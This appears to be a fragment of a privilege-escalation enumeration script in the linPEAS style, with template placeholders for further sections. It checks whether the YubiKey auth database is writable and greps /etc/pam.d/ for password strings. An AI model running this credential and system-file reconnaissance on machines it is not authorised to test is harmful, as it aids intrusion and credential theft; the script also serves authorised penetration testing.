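if grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey; then
  printf '%s\n' "System supports$RED YubiKey$NC authentication"
  if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then
    echo "${RED}/var/db/yubikey/ is writable by you"
    ls -ld /var/db/yubikey/
  else
    ls -ld /var/db/yubikey/ 2>/dev/null
  fi
fi
echo ""
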
#-- SI) Passwords inside pam.d
# Any line under /etc/pam.d/ mentioning "passwd" (case-insensitive), with
# comment lines dropped. Helpers: print_2title; colour: SED_RED.
print_2title "Passwords inside pam.d"
grep -Ri "passwd" /etc/pam.d/ 2>/dev/null \
  | grep -v ":#" \
  | sed "s,passwd,${SED_RED},"
echo ""




peass{SNMP}

peass{Pypirc}

peass{Postfix}

peass{Ldaprc}

peass{Env}

peass{Msmtprc}

peass{Keepass}

peass{FTP}

peass{EXTRA_SECTIONS}

peass{Interesting logs}

peass{Windows Files}

peass{Other Interesting Files}